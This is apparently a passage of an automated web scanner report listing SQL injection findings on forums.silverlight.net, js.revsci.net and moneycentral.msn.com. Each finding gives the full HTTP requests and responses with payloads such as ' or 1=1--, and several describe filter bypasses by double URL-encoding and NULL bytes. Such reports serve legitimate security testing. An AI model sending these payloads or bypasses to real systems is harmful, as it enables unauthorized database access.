The ASP.NET_SessionId cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the ASP.NET_SessionId cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /user/viewonline.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv';

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 104849
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sun, 30 Jan 2011 11:11:00 GMT; expires=Mon, 30-Jan-2012 16:11:00 GMT; path=/
Set-Cookie: ASP.NET_SessionId=se2isf55pdj1fz45lo4mp3no; path=/; HttpOnly
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sun, 30-Jan-2011 16:31:00 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 16:10:59 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Who's
...[SNIP]...
<a href="/forums/p/169799/382512.aspx">How to access PostgreSQL DBs with Silverlight? : The Official Microsoft Silverlight Site</a>
...[SNIP]...

1.15. http://forums.silverlight.net/user/viewonline.aspx [Referer HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://forums.silverlight.net
Path:   /user/viewonline.aspx

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payload 12539998'%20or%201%3d1--%20 was submitted in the Referer HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /user/viewonline.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Referer: http://www.google.com/search?hl=en&q=12539998'%20or%201%3d1--%20

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 134518
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sun, 30 Jan 2011 11:13:12 GMT; expires=Mon, 30-Jan-2012 16:13:12 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sun, 30-Jan-2011 16:33:12 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 16:13:12 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Who's
...[SNIP]...
<a href="/forums/p/169799/382512.aspx">How to access PostgreSQL DBs with Silverlight? : The Official Microsoft Silverlight Site</a>
...[SNIP]...

1.16. http://forums.silverlight.net/user/viewonline.aspx [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /user/viewonline.aspx

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /user/viewonline.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 126254
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sun, 30 Jan 2011 11:12:38 GMT; expires=Mon, 30-Jan-2012 16:12:38 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sun, 30-Jan-2011 16:32:38 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 16:12:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Who's
...[SNIP]...
<a href="/forums/p/169799/382512.aspx">How to access PostgreSQL DBs with Silverlight? : The Official Microsoft Silverlight Site</a>
...[SNIP]...

Request 2

GET /user/viewonline.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 125316
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sun, 30 Jan 2011 11:12:51 GMT; expires=Mon, 30-Jan-2012 16:12:51 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sun, 30-Jan-2011 16:32:51 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 16:12:52 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Who's
...[SNIP]...

1.17. http://forums.silverlight.net/user/viewonline.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://forums.silverlight.net
Path:   /user/viewonline.aspx

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /user/viewonline.aspx?1'=1 HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 124531
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sun, 30 Jan 2011 11:12:31 GMT; expires=Mon, 30-Jan-2012 16:12:31 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sun, 30-Jan-2011 16:32:31 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 16:12:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Who's
...[SNIP]...
<a href="/forums/p/169799/382512.aspx">How to access PostgreSQL DBs with Silverlight? : The Official Microsoft Silverlight Site</a>
...[SNIP]...

1.18. http://forums.silverlight.net/user/viewonline.aspx [omniID cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://forums.silverlight.net
Path:   /user/viewonline.aspx

Issue detail

The omniID cookie appears to be vulnerable to SQL injection attacks. The payload '%20and%201%3d1--%20 was submitted in the omniID cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /user/viewonline.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a'%20and%201%3d1--%20; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 260462
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sun, 30 Jan 2011 11:07:50 GMT; expires=Mon, 30-Jan-2012 16:07:50 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sun, 30-Jan-2011 16:27:50 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 16:07:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Who's
...[SNIP]...
<a href="/forums/p/169799/382512.aspx">How to access PostgreSQL DBs with Silverlight? : The Official Microsoft Silverlight Site</a>
...[SNIP]...

1.19. http://js.revsci.net/gateway/gw.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /gateway/gw.js'%20and%201%3d1--%20 HTTP/1.1
Host: js.revsci.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ...[SNIP]...

Response 1

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Content-Length: 1488
Date: Sun, 30 Jan 2011 02:09:10 GMT
Connection: close

<html><head><title>Apache Tomcat/5.5.23 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans
...[SNIP]...
<pre>java.lang.NullPointerException
   com.revenuescience.util.CustomerConfigManager.getCustomerConfig(CustomerConfigManager.java:20)
   com.revenuescience.audiencesearch.jss.gs.GatewayServlet.doGet(GatewayServlet.java:202)
   javax.servlet.http.HttpServlet.service(HttpServlet.java:690)
   javax.servlet.http.HttpServlet.service(HttpServlet.java:803)
</pre></p><p><b>note</b> <u>The full stack trace of the root cause is available in the Apache Tomcat/5.5.23 logs.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/5.5.23</h3></body></html>

Request 2

GET /gateway/gw.js'%20and%201%3d2--%20 HTTP/1.1
Host: js.revsci.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ...[SNIP]...

Response 2

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Content-Length: 1180
Date: Sun, 30 Jan 2011 02:09:10 GMT
Connection: close

<html><head><title>Apache Tomcat/5.5.23 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans
...[SNIP]...
<pre>java.lang.NullPointerException
</pre></p><p><b>note</b> <u>The full stack trace of the root cause is available in the Apache Tomcat/5.5.23 logs.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/5.5.23</h3></body></html>

1.20. http://redacted/ [CC cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /

Issue detail

The CC cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the CC cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET / HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US'; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1 (redirected)

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 02:13:01 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET / HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US''; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2 (redirected)

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 30 Jan 2011 02:13:01 GMT
Server: Microsoft-IIS/6.0
Location: http://money.redacted//
Content-Length: 54

object moved <a href="http://money.msn.com//">here</a>

1.21. http://redacted/ [s_sq cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /

Issue detail

The s_sq cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_sq cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the s_sq cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET / HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D%2527; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 18:02:50 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET / HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D%2527%2527; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 30 Jan 2011 18:02:51 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
pragma: no-cache
Location: http://moneycentral.msn.com/home.asp
Content-Length: 157
Content-Type: text/html
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://moneycentral.redacted/home.asp">here</a>.</body>

1.22. http://redacted/detail/stock_quote [ATC_ID cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /detail/stock_quote

Issue detail

The ATC_ID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ATC_ID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the ATC_ID cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /detail/stock_quote?symbol= HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041%2527; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 02:16:18 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /detail/stock_quote?symbol= HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041%2527%2527; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 302 Found
Connection: close
Date: Sun, 30 Jan 2011 02:16:19 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://investing.money.redacted/investments/stock-price
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 171

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://investing.money.redacted/investments/stock-price">here</a>.</h2>
</body></html>

1.23. http://redacted/detail/stock_quote [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /detail/stock_quote

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /detail/stock_quote HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Referer: http://www.google.com/search?hl=en&q=%00'

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 02:16:12 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /detail/stock_quote HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Referer: http://www.google.com/search?hl=en&q=%00''

Response 2

HTTP/1.1 302 Found
Connection: close
Date: Sun, 30 Jan 2011 02:16:13 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://investing.money.redacted/investments/stock-price
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 171

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://investing.money.redacted/investments/stock-price">here</a>.</h2>
</body></html>

1.24. http://redacted/detail/stock_quote [Sample cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /detail/stock_quote

Issue detail

The Sample cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Sample cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Sample cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /detail/stock_quote HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69%2527; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1 (redirected)

HTTP/1.1 200 OK
Content-Length: 3080
Content-Type: text/html
Last-Modified: Wed, 04 Jun 2008 17:06:59 GMT
Accept-Ranges: bytes
ETag: "40a29a6665c6c81:1a400"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Server: TK2MCWBA01
Date: Sun, 30 Jan 2011 02:13:55 GMT
Connection: close

<LINK REL=STYLESHEET HREF=/inc/winstyle.css>
<STYLE TYPE=text/css><!--

.heading3 {color:#CC9900; font-weight: bold;font-size:11pt;font-family: Arial,Helvetica;}
.CatBackground {background:#CC9900
...[SNIP]...
<BR>

If you received this message in error, we apologize for the inconvenience.<BR>
